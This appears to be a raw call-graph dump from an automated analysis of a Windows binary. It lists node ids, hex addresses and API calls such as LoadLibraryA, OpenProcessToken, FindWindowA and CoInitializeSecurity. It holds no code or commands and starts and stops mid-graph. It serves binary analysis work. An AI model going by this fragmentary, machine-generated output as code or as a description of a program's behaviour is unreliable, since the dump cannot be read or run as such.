11080618 80419->80420 80421 1108062f 80419->80421 80431 11029450 265 API calls 2 library calls 80420->80431 80423 11080648 80421->80423 80424 1108062c 80421->80424 80427 110aff90 80423->80427 80424->80421 80432 11029450 265 API calls 2 library calls 80424->80432 80433 110812d0 80427->80433 80434 1108131d 80433->80434 80435 110812f1 80433->80435 80437 1108136a wsprintfA 80434->80437 80438 11081345 wsprintfA 80434->80438 80435->80434 80436 1108130b 80435->80436 80439 11161d01 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 80436->80439 80445 11029450 265 API calls 2 library calls 80437->80445 80438->80434 80441 11081319 80439->80441 80441->80370 80441->80371 80448 110ea45b 80446->80448 80447 110ea4f5 80456 110b0190 267 API calls std::locale::_Init 80447->80456 80448->80447 80449 110ea47e 80448->80449 80450 110ea495 80448->80450 80457 11029450 265 API calls 2 library calls 80449->80457 80452 110ea492 80450->80452 80453 110ea4c2 SendMessageTimeoutA 80450->80453 80452->80450 80458 11029450 265 API calls 2 library calls 80452->80458 80453->80447 80456->80380 80460 1106e1c4 80459->80460 80461 1106e1c8 80460->80461 80463 1106d9a0 67 API calls 2 library calls 80460->80463 80461->80408 80463->80460 80478 11134d10 80479 11134d48 80478->80479 80480 11134d19 80478->80480 80481 11145320 std::locale::_Init 90 API calls 80480->80481 80482 11134d1e 80481->80482 80482->80479 80483 11132bf0 274 API calls 80482->80483 80484 11134d27 80483->80484 80484->80479 80485 1105dd10 79 API calls 80484->80485 80485->80479 80486 110310c0 80487 110310ce 80486->80487 80488 11145e80 268 API calls 80487->80488 80489 110310df SetUnhandledExceptionFilter 80488->80489 80490 110310ef std::locale::_Init 80489->80490 80491 11040860 80492 11040892 80491->80492 80493 11040898 80492->80493 80500 110408b4 80492->80500 80494 110facc0 15 API calls 80493->80494 80496 110408aa CloseHandle 80494->80496 80495 110409c8 80497 11161d01 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 80495->80497 80496->80500 80499 110409d5 80497->80499 80498 11040948 80513 110facc0 GetTokenInformation 80498->80513 80500->80495 80504 110408ed 80500->80504 80523 11087ee0 297 API calls 5 library calls 80500->80523 80503 1104095a 80505 11040962 CloseHandle 80503->80505 80508 11040969 80503->80508 80504->80495 80504->80498 80505->80508 80506 110409ab 80509 11161d01 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 80506->80509 80507 11040991 80510 11161d01 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 80507->80510 80508->80506 80508->80507 80511 110409c4 80509->80511 80512 110409a7 80510->80512 80514 110fad08 80513->80514 80515 110facf7 80513->80515 80524 110f1f50 9 API calls 80514->80524 80516 11161d01 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 80515->80516 80518 110fad04 80516->80518 80518->80503 80519 110fad2c 80519->80515 80520 110fad34 80519->80520 80520->80520 80521 11161d01 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 80520->80521 80522 110fad5a 80521->80522 80522->80503 80523->80504 80524->80519 80525 11089a40 80526 1110f6c0 ___DllMainCRTStartup 4 API calls 80525->80526 80528 11089a53 80526->80528 80527 11089a5d 80530 11089a84 80527->80530 80538 11089150 268 API calls std::locale::_Init 80527->80538 80528->80527 80537 11089150 268 API calls std::locale::_Init 80528->80537 80533 11089a93 80530->80533 80534 11089a10 80530->80534 80539 110896a0 80534->80539 80537->80527 80538->80530 80580 11088970 6 API calls ___DllMainCRTStartup 80539->80580 80541 110896d9 GetParent 80542 110896ec 80541->80542 80543 110896fd 80541->80543 80544 110896f0 GetParent 80542->80544 80545 11144dc0 267 API calls 80543->80545 80544->80543 80544->80544 80546 11089709 80545->80546 80547 11163fed std::locale::_Init 143 API calls 80546->80547 80548 11089716 std::ios_base::_Tidy 80547->80548 80549 11144dc0 267 API calls 80548->80549 80550 1108972f 80549->80550 80581 11013830 22 API calls 2 library calls 80550->80581 80552 1108974a 80552->80552 80553 11143230 std::locale::_Init 8 API calls 80552->80553 80555 1108978a std::ios_base::_Tidy 80553->80555 80554 110897a5 80556 11163db7 std::locale::_Init 102 API calls 80554->80556 80558 110897c3 std::locale::_Init 80554->80558 80555->80554 80557 11142290 std::locale::_Init 265 API calls 80555->80557 80556->80558 80557->80554 80560 1102a620 std::locale::_Init 145 API calls 80558->80560 80567 11089874 std::ios_base::_Tidy 80558->80567 80559 11161d01 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 80561 11089962 80559->80561 80562 11089813 80560->80562 80561->80533 80563 11142290 std::locale::_Init 265 API calls 80562->80563 80564 1108981b 80563->80564 80565 11081b40 std::locale::_Init IsDBCSLeadByte 80564->80565 80566 11089832 80565->80566 80566->80567 80568 11081bb0 86 API calls 80566->80568 80567->80559 80569 1108984a 80568->80569 80570 1108988e 80569->80570 80571 11089851 80569->80571 80573 11081bb0 86 API calls 80570->80573 80582 110b75d0 80571->80582 80574 11089899 80573->80574 80574->80567 80576 110b75d0 68 API calls 80574->80576 80578 110898a6 80576->80578 80577 110b75d0 68 API calls 80577->80567 80578->80567 80579 110b75d0 68 API calls 80578->80579 80579->80567 80580->80541 80581->80552 80585 110b75b0 80582->80585 80588 111672e3 80585->80588 80591 11167264 80588->80591 80592 11167271 80591->80592 80593 1116728b 80591->80593 80609 11169302 66 API calls __getptd_noexit 80592->80609 80593->80592 80595 11167294 GetFileAttributesA 80593->80595 80597 111672a2 GetLastError 80595->80597 80598 111672b8 80595->80598 80596 11167276 80610 111692ef 66 API calls __getptd_noexit 80596->80610 80612 11169315 66 API calls 3 library calls 80597->80612 80606 11089857 80598->80606 80614 11169302 66 API calls __getptd_noexit 80598->80614 80601 1116727d 80611 1116df04 11 API calls __controlfp_s 80601->80611 80603 111672ae 80613 111692ef 66 API calls __getptd_noexit 80603->80613 80606->80567 80606->80577 80607 111672cb 80615 111692ef 66 API calls __getptd_noexit 80607->80615 80609->80596 80610->80601 80611->80606 80612->80603 80613->80606 80614->80607 80615->80603 80616 111071e0 80617 111071ec 80616->80617 80618 1110721d 80617->80618 80620 111450a0 std::locale::_Init 90 API calls 80617->80620 80663 11106100 281 API calls std::locale::_Init 80618->80663 80622 11107201 80620->80622 80621 11107223 80622->80618 80626 111062e0 80622->80626 80625 11107218 80664 11163180 80626->80664 80628 111062fb LoadLibraryA 80675 11137340 279 API calls 2 library calls 80628->80675 80630 11106361 80631 11106365 80630->80631 80632 1110637d 80630->80632 80631->80632 80633 1110636a 80631->80633 80634 111450a0 std::locale::_Init 90 API calls 80632->80634 80635 11106375 80633->80635 80636 1110636e FreeLibrary 80633->80636 80637 11106386 80634->80637 80641 11161d01 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 80635->80641 80636->80635 80638 111063a1 LoadLibraryA GetProcAddress 80637->80638 80639 11106397 80637->80639 80640 111064d1 SetLastError 80638->80640 80646 11106443 80638->80646 80639->80638 80643 1110660f 80640->80643 80642 11106665 80641->80642 80642->80618 80642->80625 80644 111450a0 std::locale::_Init 90 API calls 80643->80644 80645 11106624 80644->80645 80647 11106635 FreeLibrary 80645->80647 80648 1110663c 80645->80648 80646->80643 80650 111064f2 OpenProcess 80646->80650 80661 11106497 80646->80661 80665 11025d00 80646->80665 80647->80648 80648->80635 80649 11106640 FreeLibrary 80648->80649 80649->80635 80650->80646 80650->80661 80651 111064a5 GetProcAddress 80653 111064de SetLastError 80651->80653 80651->80661 80653->80661 80654 111065e5 CloseHandle 80654->80643 80654->80661 80655 11081b40 std::locale::_Init IsDBCSLeadByte 80655->80661 80656 11081bb0 86 API calls 80656->80661 80657 11106556 OpenProcessToken 80657->80654 80657->80661 80658 11106574 GetTokenInformation 80659 111065d8 CloseHandle 80658->80659 80658->80661 80659->80654 80661->80643 80661->80646 80661->80650 80661->80651 80661->80654 80661->80655 80661->80656 80661->80657 80661->80658 80661->80659 80676 11106100 281 API calls std::locale::_Init 80661->80676 80677 110f5e90 25 API calls std::locale::_Init 80661->80677 80663->80621 80664->80628 80666 11025d0e GetProcAddress 80665->80666 80667 11025d1f 80665->80667 80666->80667 80668 11025d38 80667->80668 80669 11025d2c K32GetProcessImageFileNameA 80667->80669 80671 11025d3e GetProcAddress 80668->80671 80672 11025d4f 80668->80672 80669->80668 80670 11025d71 80669->80670 80670->80661 80671->80672 80673 11025d56 80672->80673 80674 11025d67 SetLastError 80672->80674 80673->80661 80674->80670 80675->80630 80676->80661 80677->80661 80678 110173f0 GetTickCount 80685 11017300 80678->80685 80683 11146450 std::locale::_Init 21 API calls 80684 11017437 80683->80684 80686 11017320 80685->80686 80687 110173d6 80685->80687 80688 11017342 CoInitialize _GetRawWMIStringW 80686->80688 80690 11017339 WaitForSingleObject 80686->80690 80689 11161d01 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 80687->80689 80691 11017375 80688->80691 80694 110173c2 80688->80694 80692 110173e5 80689->80692 80690->80688 80691->80694 80695 110173bc 80691->80695 80697 11163a2d std::locale::_Init 79 API calls 80691->80697 80698 11017220 80692->80698 80693 110173d0 CoUninitialize 80693->80687 80694->80687 80694->80693 80711 11163837 67 API calls __fassign 80695->80711 80697->80691 80699 11017240 80698->80699 80700 110172e6 80698->80700 80701 11017258 CoInitialize _GetRawWMIStringW 80699->80701 80703 1101724f WaitForSingleObject 80699->80703 80702 11161d01 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 80700->80702 80704 110172d2 80701->80704 80710 1101728b 80701->80710 80705 110172f5 SetEvent GetTickCount 80702->80705 80703->80701 80704->80700 80706 110172e0 CoUninitialize 80704->80706 80705->80683 80706->80700 80707 110172cc 80712 11163837 67 API calls __fassign 80707->80712 80709 11163a2d std::locale::_Init 79 API calls 80709->80710 80710->80704 80710->80707 80710->80709 80711->80694 80712->80704 80713 11025cd0 LoadLibraryA 80714 1113cd60 80715 1113cd69 80714->80715 80716 1113cd6e 80714->80716 80718 11139090 80715->80718 80719 111390d2 80718->80719 80720 111390c7 GetCurrentThreadId 80718->80720 80721 111390e0 80719->80721 80852 11029330 80719->80852 80720->80719 80859 11133920 80721->80859 80727 111391d1 80731 11139202 FindWindowA 80727->80731 80737 1113929a 80727->80737 80728 1113975a 80729 11161d01 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 80728->80729 80732 11139772 80729->80732 80734 11139217 IsWindowVisible 80731->80734 80731->80737 80732->80716 80733 1113911c IsWindow IsWindowVisible 80735 11146450 std::locale::_Init 21 API calls 80733->80735 80736 1113921e 80734->80736 80734->80737 80738 11139147 80735->80738 80736->80737 80744 11138c30 392 API calls 80736->80744 80740 1105dd10 79 API calls 80737->80740 80750 111392bf 80737->80750 80739 1105dd10 79 API calls 80738->80739 80742 11139163 IsWindowVisible 80739->80742 80764 111392e7 80740->80764 80741 11139470 80743 1113948a 80741->80743 80747 11138c30 392 API calls 80741->80747 80742->80727 80746 11139171 80742->80746 80749 111394a7 80743->80749 81095 1106b860 298 API calls 80743->81095 80748 1113923f IsWindowVisible 80744->80748 80745 1105dd10 79 API calls 80751 1113945f 80745->80751 80746->80727 80752 11139179 80746->80752 80747->80743 80748->80737 80753 1113924e IsIconic 80748->80753 81096 1112ce90 12 API calls 2 library calls 80749->81096 80750->80741 80750->80745 80751->80741 80756 11139464 80751->80756 80758 11146450 std::locale::_Init 21 API calls 80752->80758 80753->80737 80759 1113925f GetForegroundWindow 80753->80759 81094 1102cff0 294 API calls std::locale::_Init 80756->81094 80762 11139183 GetForegroundWindow 80758->80762 81092 11131210 147 API calls 80759->81092 80760 111394ac 80766 111394b4 80760->80766 80767 111394bd 80760->80767 80761 1113946b 80761->80741 80771 11139192 EnableWindow 80762->80771 80772 111391be 80762->80772 80764->80750 80765 11139334 80764->80765 80774 11081a70 IsDBCSLeadByte 80764->80774 80768 11143230 std::locale::_Init 8 API calls 80765->80768 81097 11131b00 89 API calls 2 library calls 80766->81097 80769 111394d4 80767->80769 80770 111394c8 80767->80770 80776 11139346 80768->80776 81099 111317a0 299 API calls std::locale::_Init 80769->81099 80777 111394d9 80770->80777 81098 11131870 299 API calls std::locale::_Init 80770->81098 81090 11131210 147 API calls 80771->81090 80772->80727 80787 111391ca SetForegroundWindow 80772->80787 80773 1113926e 81093 11131210 147 API calls 80773->81093 80774->80765 80782 11139353 GetLastError 80776->80782 80801 11139361 80776->80801 80784 111394d2 80777->80784 80785 111395e9 80777->80785 80781 111394ba 80781->80767 80789 11146450 std::locale::_Init 21 API calls 80782->80789 80784->80777 80790 111394f1 80784->80790 80791 1113959b 80784->80791 80793 111386b0 295 API calls 80785->80793 80786 111391a9 81091 11131210 147 API calls 80786->81091 80787->80727 80788 11139275 80794 1113928b EnableWindow 80788->80794 80796 11139284 SetForegroundWindow 80788->80796 80789->80801 80790->80785 80803 1110f420 std::locale::_Init 265 API calls 80790->80803 80791->80785 81107 1103f000 68 API calls 80791->81107 80809 111395ee 80793->80809 80794->80737 80795 111391b0 EnableWindow 80795->80772 80796->80794 80798 11139615 80800 1113973a std::ios_base::_Tidy 80798->80800 80811 1105dd10 79 API calls 80798->80811 80799 111395aa 81108 1103f040 68 API calls 80799->81108 80800->80728 80801->80750 80802 111393b2 80801->80802 80805 11081a70 IsDBCSLeadByte 80801->80805 80807 11143230 std::locale::_Init 8 API calls 80802->80807 80806 11139512 80803->80806 80805->80802 80812 11139533 80806->80812 81100 110573b0 308 API calls std::locale::_Init 80806->81100 80808 111393c4 80807->80808 80808->80750 80813 111393cb GetLastError 80808->80813 80809->80798 81006 11142210 80809->81006 80810 111395b5 81109 1103f060 68 API calls 80810->81109 80826 11139645 80811->80826 81101 1110f260 InterlockedIncrement 80812->81101 80817 11146450 std::locale::_Init 21 API calls 80813->80817 80817->80750 80819 111395c0 81110 1103f020 68 API calls 80819->81110 80820 11139558 81102 1104ce00 649 API calls 80820->81102 80823 111395cb 81111 1110f270 InterlockedDecrement 80823->81111 80824 11139563 81103 1104e340 649 API calls 80824->81103 80826->80800 80827 1113968d 80826->80827 80828 11139699 GetTickCount 80826->80828 80831 1113966a 80826->80831 80827->80800 80827->80828 80828->80800 80832 111396ab 80828->80832 80830 11139599 80830->80785 80834 11146450 std::locale::_Init 21 API calls 80831->80834 80835 11142e80 145 API calls 80832->80835 80833 1113956e 81104 1104e3b0 649 API calls 80833->81104 80837 11139675 GetTickCount 80834->80837 80838 111396b7 80835->80838 80837->80800 80840 11146ee0 269 API calls 80838->80840 80839 11139579 81105 1104ce40 649 API calls 80839->81105 80842 111396c2 80840->80842 80844 11142e80 145 API calls 80842->80844 80843 11139584 80843->80785 81106 110ebf30 285 API calls 80843->81106 80845 111396d5 80844->80845 81112 11025bb0 LoadLibraryA 80845->81112 80848 111396e2 81113 1112c7a0 GetProcAddress SetLastError 80848->81113 80850 11139729 80850->80800 80851 11139733 FreeLibrary 80850->80851 80851->80800 81114 11027250 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 80852->81114 80854 1102933e 80855 11029353 80854->80855 81115 11027250 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 80854->81115 81116 11089cc0 269 API calls 2 library calls 80855->81116 80858 1102935e 80858->80721 80860 11133962 80859->80860 80861 11133c84 80859->80861 80862 1105dd10 79 API calls 80860->80862 80863 11161d01 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 80861->80863 80864 11133982 80862->80864 80865 11133c9c 80863->80865 80864->80861 80866 1113398a GetLocalTime 80864->80866 80907 11133400 80865->80907 80867 111339c1 LoadLibraryA 80866->80867 80868 111339a0 80866->80868 81117 110098c0 LoadLibraryA 80867->81117 80869 11146450 std::locale::_Init 21 API calls 80868->80869 80871 111339b5 80869->80871 80871->80867 80872 11133a15 81118 11015c30 LoadLibraryA 80872->81118 80874 11133a20 GetCurrentProcess 80875 11133a45 GetProcAddress 80874->80875 80876 11133a5d GetProcessHandleCount 80874->80876 80875->80876 80877 11133a66 SetLastError 80875->80877 80878 11133a6e 80876->80878 80877->80878 80879 11133a92 80878->80879 80880 11133a78 GetProcAddress 80878->80880 80882 11133aa0 GetProcAddress 80879->80882 80883 11133aba 80879->80883 80880->80879 80881 11133ac7 SetLastError 80880->80881 80881->80882 80882->80883 80884 11133ad4 SetLastError 80882->80884 80885 11133adf GetProcAddress 80883->80885 80884->80885 80886 11133af1 K32GetProcessMemoryInfo 80885->80886 80887 11133aff SetLastError 80885->80887 80888 11133b07 80886->80888 80887->80888 80889 11146450 std::locale::_Init 21 API calls 80888->80889 80893 11133b7d 80888->80893 80889->80893 80890 11133c5a 80891 11133c6a FreeLibrary 80890->80891 80892 11133c6d 80890->80892 80891->80892 80894 11133c77 FreeLibrary 80892->80894 80895 11133c7a 80892->80895 80893->80890 80897 1105dd10 79 API calls 80893->80897 80894->80895 80895->80861 80896 11133c81 FreeLibrary 80895->80896 80896->80861 80898 11133bce 80897->80898 80899 1105dd10 79 API calls 80898->80899 80900 11133bf6 80899->80900 80901 1105dd10 79 API calls 80900->80901 80902 11133c1d 80901->80902 80903 1105dd10 79 API calls 80902->80903 80904 11133c44 80903->80904 80904->80890 80905 11133c55 80904->80905 81119 11027780 265 API calls 2 library calls 80905->81119 80909 1113342d 80907->80909 80908 111338e9 80908->80727 80908->80728 81010 11138c30 80908->81010 80909->80908 80910 110d1550 268 API calls 80909->80910 80911 1113348e 80910->80911 80912 110d1550 268 API calls 80911->80912 80913 11133499 80912->80913 80914 111334c7 80913->80914 80915 111334de 80913->80915 81120 11029450 265 API calls 2 library calls 80914->81120 80917 11146450 std::locale::_Init 21 API calls 80915->80917 80919 111334ec 80917->80919 81121 110d12e0 265 API calls 80919->81121 81007 1114222f 81006->81007 81008 1114221a 81006->81008 81007->80798 81122 11141890 81008->81122 81013 11138c4d 81010->81013 81066 1113906f 81010->81066 81011 11161d01 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 81012 1113907e 81011->81012 81012->80733 81014 111450a0 std::locale::_Init 90 API calls 81013->81014 81013->81066 81015 11138c8c 81014->81015 81016 1105dd10 79 API calls 81015->81016 81015->81066 81017 11138cbb 81016->81017 81258 1112c920 81017->81258 81019 11138dab 81020 11138e00 PostMessageA 81019->81020 81021 1105dd10 79 API calls 81019->81021 81024 11138e15 81020->81024 81022 11138dfc 81021->81022 81022->81020 81022->81024 81023 11138e25 81026 11138e2b 81023->81026 81027 11138e4d 81023->81027 81024->81023 81267 1110f270 InterlockedDecrement 81024->81267 81030 11138e83 std::ios_base::_Tidy 81026->81030 81031 11138e9e 81026->81031 81268 11130410 315 API calls std::locale::_Init 81027->81268 81029 11138e55 81269 11146ec0 267 API calls 81029->81269 81038 11161d01 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 81030->81038 81033 11142e80 145 API calls 81031->81033 81034 11138ea3 81033->81034 81036 11146ee0 269 API calls 81034->81036 81035 11138e5f 81270 1112cb20 SetDlgItemTextA 81035->81270 81039 11138eaa SetWindowTextA 81036->81039 81042 11138e9a 81038->81042 81043 11138ec6 81039->81043 81050 11138ecd std::ios_base::_Tidy 81039->81050 81040 11138e70 std::ios_base::_Tidy 81040->81026 81042->80733 81271 111352b0 299 API calls 5 library calls 81043->81271 81044 11145b40 271 API calls 81044->81019 81046 11138f24 81047 11138f38 81046->81047 81048 11138ffc 81046->81048 81052 11138f5c 81047->81052 81274 111352b0 299 API calls 5 library calls 81047->81274 81054 1113901d 81048->81054 81056 1113900b 81048->81056 81057 11139004 81048->81057 81049 11138ef7 81049->81046 81051 11138f0c 81049->81051 81050->81046 81050->81049 81272 111352b0 299 API calls 5 library calls 81050->81272 81273 11131210 147 API calls 81051->81273 81276 110f8640 86 API calls 81052->81276 81280 110f8640 86 API calls 81054->81280 81279 11131210 147 API calls 81056->81279 81278 111352b0 299 API calls 5 library calls 81057->81278 81061 11138f1c 81061->81046 81064 11139028 81064->81066 81070 1113902c IsWindowVisible 81064->81070 81065 11138f67 81065->81066 81067 11138f6f IsWindowVisible 81065->81067 81066->81011 81067->81066 81071 11138f86 81067->81071 81068 1113901a 81068->81054 81069 11138f46 81069->81052 81072 11138f52 81069->81072 81070->81066 81073 1113903e IsWindowVisible 81070->81073 81074 111450a0 std::locale::_Init 90 API calls 81071->81074 81275 11131210 147 API calls 81072->81275 81073->81066 81076 1113904b EnableWindow 81073->81076 81077 11138f91 81074->81077 81281 11131210 147 API calls 81076->81281 81077->81066 81080 11138f9c GetForegroundWindow IsWindowVisible 81077->81080 81078 11138f59 81078->81052 81082 11138fc1 81080->81082 81083 11138fb6 EnableWindow 81080->81083 81081 11139062 EnableWindow 81081->81066 81277 11131210 147 API calls 81082->81277 81083->81082 81085 11138fc8 81086 11138fde EnableWindow 81085->81086 81087 11138fd7 SetForegroundWindow 81085->81087 81088 11161d01 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 81086->81088 81087->81086 81089 11138ff8 81088->81089 81089->80733 81090->80786 81091->80795 81092->80773 81093->80788 81094->80761 81095->80749 81096->80760 81097->80781 81098->80784 81099->80777 81100->80812 81101->80820 81102->80824 81103->80833 81104->80839 81105->80843 81106->80830 81107->80799 81108->80810 81109->80819 81110->80823 81111->80830 81112->80848 81113->80850 81114->80854 81115->80854 81116->80858 81117->80872 81118->80874 81119->80890 81123 111418cf 81122->81123 81174 111418c8 std::ios_base::_Tidy 81122->81174 81124 1110f420 std::locale::_Init 265 API calls 81123->81124 81126 111418d6 81124->81126 81125 11161d01 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 81127 1114220a 81125->81127 81128 11141906 81126->81128 81249 11060f70 301 API calls std::locale::_Init 81126->81249 81127->81007 81130 11061700 275 API calls 81128->81130 81131 11141942 81130->81131 81132 11141949 RegCloseKey 81131->81132 81133 11141950 std::locale::_Init 81131->81133 81132->81133 81134 11144dc0 267 API calls 81133->81134 81135 1114196c 81134->81135 81136 11143230 std::locale::_Init 8 API calls 81135->81136 81137 11141980 81136->81137 81138 11141997 81137->81138 81139 11062d60 330 API calls 81137->81139 81140 1110f420 std::locale::_Init 265 API calls 81138->81140 81139->81138 81141 1114199e 81140->81141 81142 111419ba 81141->81142 81250 11060be0 293 API calls std::locale::_Init 81141->81250 81144 1110f420 std::locale::_Init 265 API calls 81142->81144 81145 111419d3 81144->81145 81146 111419ef 81145->81146 81251 11060be0 293 API calls std::locale::_Init 81145->81251 81148 1110f420 std::locale::_Init 265 API calls 81146->81148 81149 11141a08 81148->81149 81150 11141a24 81149->81150 81252 11060be0 293 API calls std::locale::_Init 81149->81252 81152 11060760 268 API calls 81150->81152 81153 11141a4d 81152->81153 81154 11060760 268 API calls 81153->81154 81167 11141a67 81154->81167 81155 11141d95 81157 110d1550 268 API calls 81155->81157 81158 11142179 81155->81158 81156 110607f0 274 API calls 81156->81167 81159 11141db3 81157->81159 81166 11060640 69 API calls 81158->81166 81164 1105dd10 79 API calls 81159->81164 81160 11141d85 81163 11146450 std::locale::_Init 21 API calls 81160->81163 81161 11081bb0 86 API calls 81161->81167 81162 11146450 21 API calls std::locale::_Init 81162->81167 81163->81155 81165 11141df0 81164->81165 81168 11141f3d 81165->81168 81170 11060760 268 API calls 81165->81170 81169 111421d2 81166->81169 81167->81155 81167->81156 81167->81160 81167->81161 81167->81162 81186 111319f0 86 API calls 81167->81186 81189 11081c60 86 API calls std::locale::_Init 81167->81189 81172 11060f40 274 API calls 81168->81172 81171 11060640 69 API calls 81169->81171 81173 11141e0e 81170->81173 81171->81174 81175 11141f59 81172->81175 81176 110607f0 274 API calls 81173->81176 81174->81125 81253 110679c0 298 API calls std::locale::_Init 81175->81253 81177 11141e1d 81176->81177 81178 11141e52 81177->81178 81181 11146450 std::locale::_Init 21 API calls 81177->81181 81188 110607f0 274 API calls 81177->81188 81182 11060760 268 API calls 81178->81182 81180 11141f83 81184 11141fb3 EnterCriticalSection 81180->81184 81193 11141f87 81180->81193 81181->81177 81183 11141e68 81182->81183 81185 110607f0 274 API calls 81183->81185 81187 11060420 271 API calls 81184->81187 81203 11141e78 81185->81203 81186->81167 81191 11141fd0 81187->81191 81188->81177 81189->81167 81194 11060f40 274 API calls 81191->81194 81192 11141eb1 81195 11060760 268 API calls 81192->81195 81193->81184 81254 110508e0 365 API calls 4 library calls 81193->81254 81255 110679c0 298 API calls std::locale::_Init 81193->81255 81196 11141fe6 81194->81196 81198 11141ec7 81195->81198 81199 11141ffa LeaveCriticalSection 81196->81199 81200 1102a9f0 283 API calls 81196->81200 81197 11146450 std::locale::_Init 21 API calls 81197->81203 81205 110607f0 274 API calls 81198->81205 81201 1114204e 81199->81201 81202 1114200e 81199->81202 81206 11141ff7 81200->81206 81207 11133400 273 API calls 81201->81207 81202->81201 81210 11146450 std::locale::_Init 21 API calls 81202->81210 81203->81192 81203->81197 81208 110607f0 274 API calls 81203->81208 81219 11141ed6 81205->81219 81206->81199 81209 11142058 81207->81209 81208->81203 81212 110d1550 268 API calls 81209->81212 81214 1114201c 81210->81214 81211 11141f11 81213 11060640 69 API calls 81211->81213 81216 11142066 81212->81216 81217 11141f1f 81213->81217 81218 1113cc30 311 API calls 81214->81218 81215 11146450 std::locale::_Init 21 API calls 81215->81219 81256 110cff20 265 API calls std::locale::_Init 81216->81256 81220 11060640 69 API calls 81217->81220 81221 11142021 81218->81221 81219->81211 81219->81215 81222 110607f0 274 API calls 81219->81222 81223 11141f2e 81220->81223 81224 111414a0 1351 API calls 81221->81224 81222->81219 81227 11142027 81224->81227 81227->81201 81229 11146450 std::locale::_Init 21 API calls 81227->81229 81228 1114209c 81243 1114211f 81228->81243 81257 110d12e0 265 API calls 81228->81257 81249->81128 81250->81142 81251->81146 81252->81150 81253->81180 81254->81193 81255->81193 81256->81228 81259 1112c93c 81258->81259 81260 1112c977 81259->81260 81261 1112c964 81259->81261 81282 1106b860 298 API calls 81260->81282 81263 11146ee0 269 API calls 81261->81263 81264 1112c96f 81263->81264 81265 1112c9c3 81264->81265 81266 11142290 std::locale::_Init 265 API calls 81264->81266 81265->81019 81265->81044 81266->81265 81267->81023 81268->81029 81269->81035 81270->81040 81271->81050 81272->81049 81273->81061 81274->81069 81275->81078 81276->81065 81277->81085 81278->81056 81279->81068 81280->81064 81281->81081 81282->81264 81283 11144200 81284 11144211 81283->81284 81298 11143c20 81284->81298 81288 11144295 81290 111442b2 81288->81290 81293 111442a4 81288->81293 81289 1114425b 81291 11144262 ResetEvent 81289->81291 81306 11143de0 265 API calls 2 library calls 81291->81306 81307 11143de0 265 API calls 2 library calls 81293->81307 81294 11144276 SetEvent WaitForMultipleObjects 81294->81291 81296 11144294 81294->81296 81296->81288 81297 111442af 81297->81290 81299 11143c2c GetCurrentProcess 81298->81299 81300 11143c4f 81298->81300 81299->81300 81301 11143c3d GetModuleFileNameA 81299->81301 81302 1110f420 std::locale::_Init 263 API calls 81300->81302 81304 11143c79 WaitForMultipleObjects 81300->81304 81301->81300 81303 11143c6b 81302->81303 81303->81304 81308 11143570 GetModuleFileNameA 81303->81308 81304->81288 81304->81289 81306->81294 81307->81297 81309 111435f3 81308->81309 81310 111435b3 81308->81310 81312 111435ff LoadLibraryA 81309->81312 81313 11143619 GetModuleHandleA GetProcAddress 81309->81313 81311 11081b40 std::locale::_Init IsDBCSLeadByte 81310->81311 81314 111435c1 81311->81314 81312->81313 81315 1114360e LoadLibraryA 81312->81315 81316 11143647 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 81313->81316 81317 11143639 81313->81317 81314->81309 81318 111435c8 LoadLibraryA 81314->81318 81315->81313 81319 11143673 10 API calls 81316->81319 81317->81319 81318->81309 81320 11161d01 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 81319->81320 81321 111436f0 81320->81321 81321->81304 81322 1115bde0 81323 1115bdf4 81322->81323 81324 1115bdec 81322->81324 81334 111631ab 81323->81334 81327 1115be14 81328 1115bf40 81330 11162be5 _free 66 API calls 81328->81330 81331 1115bf68 81330->81331 81332 1115be31 81332->81328 81333 1115bf24 SetLastError 81332->81333 81333->81332 81335 11170166 __calloc_crt 66 API calls 81334->81335 81336 111631c5 81335->81336 81337 1115be08 81336->81337 81358 111692ef 66 API calls __getptd_noexit 81336->81358 81337->81327 81337->81328 81341 1115ba20 CoInitializeSecurity CoCreateInstance 81337->81341 81339 111631d8 81339->81337 81359 111692ef 66 API calls __getptd_noexit 81339->81359 81342 1115ba95 wsprintfW SysAllocString 81341->81342 81343 1115bc14 81341->81343 81348 1115badb 81342->81348 81344 11161d01 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 81343->81344 81346 1115bc40 81344->81346 81345 1115bc01 SysFreeString 81345->81343 81346->81332 81347 1115bbe9 81347->81345 81348->81345 81348->81347 81348->81348 81349 1115bb6c 81348->81349 81350 1115bb5a wsprintfW 81348->81350 81360 110974a0 81349->81360 81350->81349 81352 1115bb7e 81353 110974a0 266 API calls 81352->81353 81354 1115bb93 81353->81354 81365 11097550 